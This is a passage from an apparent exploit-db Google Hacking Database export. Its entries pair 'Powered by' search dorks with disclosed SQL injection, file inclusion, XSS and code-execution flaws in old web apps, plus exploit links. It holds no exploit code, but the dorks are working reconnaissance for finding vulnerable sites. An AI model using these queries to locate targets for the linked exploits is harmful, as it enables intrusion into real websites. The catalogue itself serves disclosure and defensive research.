<textualDescription>It is reported that DMXReady Site Chassis Manager is susceptible to two remotely exploitable input validation vulnerabilities. These vulnerabilities are due to a failure of the application to properly sanitize user-supplied data.The first issue is an unspecified cross-site scripting vulnerability. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.The second issue is an unspecified SQL injection vulnerability. It may be possible for a remote user to inject arbitrary SQL queries into the underlying database used by the application. This could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks.Successful exploitation could result in compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.</textualDescription>
<query>&quot;Powered by DMXReady Site Chassis Manager&quot; -site:dmxready.com</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DMXReady+Site+Chassis+Manager%22+-site%3Admxready.com&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1633</id>
<link>https://www.exploit-db.com/ghdb/1633</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Download 3000&quot;</shortDescription>
<textualDescription>Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5299</textualDescription>
<query>&quot;Powered by Download 3000&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Download+3000%22</querystring>
<edb>https://www.exploit-db.com/exploits/5299</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3485</id>
<link>https://www.exploit-db.com/ghdb/3485</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Drake CMS&quot; inurl:index.php?option=guestbook</shortDescription>
<textualDescription>Drake CMS 0.4.11 Remote Blind SQL Injection - CVE: 2008-6475: https://www.exploit-db.com/exploits/5391</textualDescription>
<query>&quot;Powered by Drake CMS&quot; inurl:index.php?option=guestbook</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Drake+CMS%22+inurl:index.php%3Foption%3Dguestbook</querystring>
<edb>https://www.exploit-db.com/exploits/5391</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3301</id>
<link>https://www.exploit-db.com/ghdb/3301</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by DreamAccount 3.1&quot;</shortDescription>
<textualDescription>DreamAccount 3.1 (auth.api.php) Remote File Include - CVE: 2006-6232: https://www.exploit-db.com/exploits/1954</textualDescription>
<query>&quot;powered by DreamAccount 3.1&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+DreamAccount+3.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/1954</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2155</id>
<link>https://www.exploit-db.com/ghdb/2155</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Drumbeat&quot; inurl:index02.php</shortDescription>
<textualDescription>Drumbeat CMS SQL Injection: https://www.exploit-db.com/exploits/10575</textualDescription>
<query>&quot;Powered by Drumbeat&quot; inurl:index02.php</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Drumbeat%22+inurl:index02.php</querystring>
<edb>https://www.exploit-db.com/exploits/10575</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1840</id>
<link>https://www.exploit-db.com/ghdb/1840</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DVHome.cn&quot;</shortDescription>
<textualDescription>PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion Vulnerability - CVE: 2007-2544: https://www.exploit-db.com/exploits/3854</textualDescription>
<query>&quot;Powered by DVHome.cn&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DVHome.cn%22</querystring>
<edb>https://www.exploit-db.com/exploits/3854</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1792</id>
<link>https://www.exploit-db.com/ghdb/1792</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DWdirectory&quot;</shortDescription>
<textualDescription>DWdirectory 2.1 Remote SQL Injection Vulnerability - CVE: 2007-6392: https://www.exploit-db.com/exploits/4708</textualDescription>
<query>&quot;Powered by DWdirectory&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+DWdirectory%22</querystring>
<edb>https://www.exploit-db.com/exploits/4708</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1664</id>
<link>https://www.exploit-db.com/ghdb/1664</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By DynamicPAD&quot;</shortDescription>
<textualDescription>DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: https://www.exploit-db.com/exploits/3868</textualDescription>
<query>&quot;Powered By DynamicPAD&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+DynamicPAD%22</querystring>
<edb>https://www.exploit-db.com/exploits/3868</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2321</id>
<link>https://www.exploit-db.com/ghdb/2321</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by DZcms&quot;</shortDescription>
<textualDescription>DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7722</textualDescription>
<query>&quot;Powered by DZcms&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+DZcms%22</querystring>
<edb>https://www.exploit-db.com/exploits/7722</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1915</id>
<link>https://www.exploit-db.com/ghdb/1915</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by easytrade&quot;</shortDescription>
<textualDescription>easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability - CVE: 2008-2790: https://www.exploit-db.com/exploits/5840</textualDescription>
<query>&quot;powered by easytrade&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+easytrade%22</querystring>
<edb>https://www.exploit-db.com/exploits/5840</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1947</id>
<link>https://www.exploit-db.com/ghdb/1947</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ECShop v2.5.0&quot;</shortDescription>
<textualDescription>ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability - CVE: 2009-1622: https://www.exploit-db.com/exploits/8548</textualDescription>
<query>&quot;Powered by ECShop v2.5.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ECShop+v2.5.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/8548</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3072</id>
<link>https://www.exploit-db.com/ghdb/3072</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By EgyPlus&quot;</shortDescription>
<textualDescription>EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: https://www.exploit-db.com/exploits/8865</textualDescription>
<query>&quot;Powered By EgyPlus&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+EgyPlus%22</querystring>
<edb>https://www.exploit-db.com/exploits/8865</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2450</id>
<link>https://www.exploit-db.com/ghdb/2450</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Elgg, the leading open source social networking platform&quot;</shortDescription>
<textualDescription>elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: https://www.exploit-db.com/exploits/9355</textualDescription>
<query>&quot;Powered by Elgg, the leading open source social networking platform&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Elgg,+the+leading+open+source+social+networking+platform%22</querystring>
<edb>https://www.exploit-db.com/exploits/9355</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3234</id>
<link>https://www.exploit-db.com/ghdb/3234</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by EPay Enterprise&quot; inurl:&quot;shop.htm?cid=&quot; | nurl:&quot;shop.php?cid=&quot;</shortDescription>
<textualDescription>EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12353</textualDescription>
<query>&quot;Powered by EPay Enterprise&quot; inurl:&quot;shop.htm?cid=&quot; | nurl:&quot;shop.php?cid=&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+EPay+Enterprise%22+inurl:%22shop.htm%3Fcid%3D%22+|+nurl:%22shop.php%3Fcid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12353</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1548</id>
<link>https://www.exploit-db.com/ghdb/1548</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by EQdkp&quot;</shortDescription>
<textualDescription>EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: https://www.exploit-db.com/exploits/1764</textualDescription>
<query>&quot;powered by EQdkp&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+EQdkp%22</querystring>
<edb>https://www.exploit-db.com/exploits/1764</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1679</id>
<link>https://www.exploit-db.com/ghdb/1679</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Espinas IT&quot;</shortDescription>
<textualDescription>Espinas CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12100</textualDescription>
<query>&quot;Powered by Espinas IT&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Espinas+IT%22</querystring>
<edb>https://www.exploit-db.com/exploits/12100</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2261</id>
<link>https://www.exploit-db.com/ghdb/2261</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ExBB &quot;</shortDescription>
<textualDescription>ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: https://www.exploit-db.com/exploits/2273</textualDescription>
<query>&quot;Powered by ExBB &quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+ExBB+%22</querystring>
<edb>https://www.exploit-db.com/exploits/2273</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1843</id>
<link>https://www.exploit-db.com/ghdb/1843</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ExtCalendar v2&quot;</shortDescription>
<textualDescription>com_extcalendar Mambo Component 2.0 Include Vulnerability: https://www.exploit-db.com/exploits/2022</textualDescription>
<query>&quot;powered by ExtCalendar v2&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+ExtCalendar+v2%22</querystring>
<edb>https://www.exploit-db.com/exploits/2022</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3566</id>
<link>https://www.exploit-db.com/ghdb/3566</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by eXV2 Vers&quot;</shortDescription>
<textualDescription>exV2 2.0.4.3 extract() Remote Command Execution - CVE: 2006-7080:
https://www.exploit-db.com/exploits/2415</textualDescription>
<query>&quot;Powered by eXV2 Vers&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+eXV2+Vers%22</querystring>
<edb>https://www.exploit-db.com/exploits/2415</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2865</id>
<link>https://www.exploit-db.com/ghdb/2865</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by EZCMS&quot;</shortDescription>
<textualDescription>EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: https://www.exploit-db.com/exploits/5819</textualDescription>
<query>&quot;Powered by EZCMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+EZCMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/5819</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1589</id>
<link>https://www.exploit-db.com/ghdb/1589</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ezContents Version 1.4.5&quot;</shortDescription>
<textualDescription>ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: https://www.exploit-db.com/exploits/4694</textualDescription>
<query>&quot;Powered by ezContents Version 1.4.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ezContents+Version+1.4.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/4694</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1610</id>
<link>https://www.exploit-db.com/ghdb/1610</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ezUserManager&quot;</shortDescription>
<textualDescription>ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: https://www.exploit-db.com/exploits/1795</textualDescription>
<query>&quot;powered by ezUserManager&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+ezUserManager%22</querystring>
<edb>https://www.exploit-db.com/exploits/1795</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3329</id>
<link>https://www.exploit-db.com/ghdb/3329</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by F3Site&quot;</shortDescription>
<textualDescription>F3Site 2.1 Remote Code Execution - CVE: 2007-0763: https://www.exploit-db.com/exploits/3255</textualDescription>
<query>&quot;Powered by F3Site&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+F3Site%22</querystring>
<edb>https://www.exploit-db.com/exploits/3255</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2405</id>
<link>https://www.exploit-db.com/ghdb/2405</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Fantastic News v2.1.2&quot; or &quot;Powered by Fantastic News v2.1.3&quot;</shortDescription>
<textualDescription>Fantastic News 2.1.3 (script_path) Remote File Include Vulnerability - CVE: 2006-4285: https://www.exploit-db.com/exploits/2221</textualDescription>
<query>&quot;Powered by Fantastic News v2.1.2&quot; or &quot;Powered by Fantastic News v2.1.3&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Fantastic+News+v2.1.2%22+or+%22Powered+by+Fantastic+News+v2.1.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/2221</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2161</id>
<link>https://www.exploit-db.com/ghdb/2161</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FlashGameScript&quot;</shortDescription>
<textualDescription>FlashGameScript 1.7 (user) Remote SQL Injection Vulnerability - CVE: 2007-3646: https://www.exploit-db.com/exploits/4161</textualDescription>
<query>&quot;Powered by FlashGameScript&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FlashGameScript%22</querystring>
<edb>https://www.exploit-db.com/exploits/4161</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2611</id>
<link>https://www.exploit-db.com/ghdb/2611</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by FlatPress&quot;</shortDescription>
<textualDescription>FlatPress 0.909.1 Stored XSS Vulnerability: https://www.exploit-db.com/exploits/12034</textualDescription>
<query>&quot;powered by FlatPress&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+FlatPress%22</querystring>
<edb>https://www.exploit-db.com/exploits/12034</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1827</id>
<link>https://www.exploit-db.com/ghdb/1827</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ForumApp&quot;</shortDescription>
<textualDescription>ForumApp 3.3 Remote Database Disclosure Vulnerability - CVE: 2008-6147: https://www.exploit-db.com/exploits/7599</textualDescription>
<query>&quot;Powered by ForumApp&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+ForumApp%22</querystring>
<edb>https://www.exploit-db.com/exploits/7599</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3155</id>
<link>https://www.exploit-db.com/ghdb/3155</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FreeWebshop&quot;</shortDescription>
<textualDescription>FreeWebshop</textualDescription>
<query>&quot;Powered by FreeWebshop&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FreeWebshop%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3466</id>
<link>https://www.exploit-db.com/ghdb/3466</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FreeWebshop.org 2.2.1&quot;</shortDescription>
<textualDescription>FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: https://www.exploit-db.com/exploits/4740</textualDescription>
<query>&quot;Powered by FreeWebshop.org 2.2.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FreeWebshop.org+2.2.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/4740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2033</id>
<link>https://www.exploit-db.com/ghdb/2033</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FubarForum v1.5&quot;</shortDescription>
<textualDescription>FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability - CVE: 2008-2887: https://www.exploit-db.com/exploits/5872</textualDescription>
<query>&quot;Powered by FubarForum v1.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FubarForum+v1.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/5872</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1491</id>
<link>https://www.exploit-db.com/ghdb/1491</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FubarForum v1.6&quot;</shortDescription>
<textualDescription>FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: https://www.exploit-db.com/exploits/7595</textualDescription>
<query>&quot;Powered by FubarForum v1.6&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FubarForum+v1.6%22</querystring>
<edb>https://www.exploit-db.com/exploits/7595</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1506</id>
<link>https://www.exploit-db.com/ghdb/1506</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FubarForum v1.6&quot;</shortDescription>
<textualDescription>FubarForum 1.6 Admin Bypass Change User Password Vulnerability: https://www.exploit-db.com/exploits/7606</textualDescription>
<query>&quot;Powered by FubarForum v1.6&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FubarForum+v1.6%22</querystring>
<edb>https://www.exploit-db.com/exploits/7606</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1077</id>
<link>https://www.exploit-db.com/ghdb/1077</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FUDForum 2.6&quot; -site:fudforum.org -johnny.ihackstuff</shortDescription>
<textualDescription>FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6</textualDescription>
<query>&quot;Powered by FUDForum 2.6&quot; -site:fudforum.org -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22Powered+by+FUDForum+2.6%22+-site%3Afudforum.org+-johnny.ihackstuff</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1087</id>
<link>https://www.exploit-db.com/ghdb/1087</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FUDForum 2.7&quot; -site:fudforum.org -johnny.ihackstuff</shortDescription>
<textualDescription>FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.7</textualDescription>
<query>&quot;Powered by FUDForum 2.7&quot; -site:fudforum.org -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Powered+by+FUDForum+2.7%22+-site%3Afudforum.org+-johnny.ihackstuff</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>554</id>
<link>https://www.exploit-db.com/ghdb/554</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by FUDforum&quot;</shortDescription>
<textualDescription>FUDforum is a forums package. It uses a combination of PHP &amp; MySQL to create a portable solution that can run on virtually any operating system. FUDforum has two security holes that allow people to download or manipulate files and directories outside of FUDforum's directories. One of the holes can be exploited by everyone, while the other requires administrator access. The program also has some SQL Injection problems. http://www.securityfocus.com/bid/5501</textualDescription>
<query>&quot;Powered by FUDforum&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+FUDforum%22+&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>2230</id>
<link>https://www.exploit-db.com/ghdb/2230</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by fuzzylime&quot;</shortDescription>
<textualDescription>fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: https://www.exploit-db.com/exploits/5260</textualDescription>
<query>&quot;powered by fuzzylime&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22powered+by+fuzzylime%22</querystring>
<edb>https://www.exploit-db.com/exploits/5260</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1105</id>
<link>https://www.exploit-db.com/ghdb/1105</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Gallery v&quot; &quot;[slideshow]&quot;|&quot;images&quot; inurl:gallery</shortDescription>
<textualDescription>There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668</textualDescription>
<query>&quot;powered by Gallery v&quot; &quot;[slideshow]&quot;|&quot;images&quot; inurl:gallery</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22powered+by+Gallery+v%22+%22%5Bslideshow%5D%22%7C%22images%22+inurl%3Agallery</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>449</id>
<link>https://www.exploit-db.com/ghdb/449</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Gallery v1.4.4&quot;</shortDescription>
<textualDescription>http://www.securityfocus.com/bid/10968/discussion/&quot;A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. &quot;</textualDescription>
<query>&quot;Powered by Gallery v1.4.4&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Gallery+v1.4.4%22</querystring>
<edb></edb>
<date>2004-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1932</id>
<link>https://www.exploit-db.com/ghdb/1932</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by GameSiteScript&quot;</shortDescription>
<textualDescription>GameSiteScript 3.1 (profile id) Remote SQL Injection Vulnerability - CVE: 2007-3631: https://www.exploit-db.com/exploits/4159</textualDescription>
<query>&quot;Powered by GameSiteScript&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+GameSiteScript%22</querystring>
<edb>https://www.exploit-db.com/exploits/4159</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3586</id>
<link>https://www.exploit-db.com/ghdb/3586</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by gcards&quot;</shortDescription>
<textualDescription>gCards 1.45 Multiple Vulnerabilities - CVE: 2006-1346:
https://www.exploit-db.com/exploits/1595</textualDescription>
<query>&quot;powered by gcards&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+gcards%22</querystring>
<edb>https://www.exploit-db.com/exploits/1595</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3034</id>
<link>https://www.exploit-db.com/ghdb/3034</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by gelato cms&quot;</shortDescription>
<textualDescription>Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: https://www.exploit-db.com/exploits/4410</textualDescription>
<query>&quot;powered by gelato cms&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+gelato+cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/4410</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2130</id>
<link>https://www.exploit-db.com/ghdb/2130</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by GeN4&quot;</shortDescription>
<textualDescription>PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14086</textualDescription>
<query>&quot;Powered by GeN4&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+GeN4%22</querystring>
<edb>https://www.exploit-db.com/exploits/14086</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2305</id>
<link>https://www.exploit-db.com/ghdb/2305</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by GetMyOwnArcade&quot;</shortDescription>
<textualDescription>GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: https://www.exploit-db.com/exploits/4291</textualDescription>
<query>&quot;Powered by GetMyOwnArcade&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+GetMyOwnArcade%22</querystring>
<edb>https://www.exploit-db.com/exploits/4291</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3133</id>
<link>https://www.exploit-db.com/ghdb/3133</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by GGCMS&quot;</shortDescription>
<textualDescription>GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: https://www.exploit-db.com/exploits/3271</textualDescription>
<query>&quot;Powered by GGCMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+GGCMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/3271</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2013</id>
<link>https://www.exploit-db.com/ghdb/2013</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Glossword 1.8.11&quot; OR &quot;Powered by Glossword 1.8.6&quot;</shortDescription>
<textualDescription>Glossword 1.8.11 (index.php x) Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9010</textualDescription>
<query>&quot;Powered by Glossword 1.8.11&quot; OR &quot;Powered by Glossword 1.8.6&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Glossword+1.8.11%22+OR+%22Powered+by+Glossword+1.8.6%22</querystring>
<edb>https://www.exploit-db.com/exploits/9010</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1638</id>
<link>https://www.exploit-db.com/ghdb/1638</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Gradman&quot;</shortDescription>
<textualDescription>Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: https://www.exploit-db.com/exploits/4936</textualDescription>
<query>&quot;powered by Gradman&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Gradman%22</querystring>
<edb>https://www.exploit-db.com/exploits/4936</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3002</id>
<link>https://www.exploit-db.com/ghdb/3002</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by Gradman&quot;</shortDescription>
<textualDescription>Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: https://www.exploit-db.com/exploits/4926</textualDescription>
<query>&quot;powered by Gradman&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+Gradman%22</querystring>
<edb>https://www.exploit-db.com/exploits/4926</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2131</id>
<link>https://www.exploit-db.com/ghdb/2131</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Gravity Board X v2.0 BETA&quot;</shortDescription>
<textualDescription>Gravity Board X 2.0b SQL Injection / Post Auth Code Execution - CVE: 2008-2996: https://www.exploit-db.com/exploits/8350</textualDescription>
<query>&quot;Powered By Gravity Board X v2.0 BETA&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Gravity+Board+X+v2.0+BETA%22</querystring>
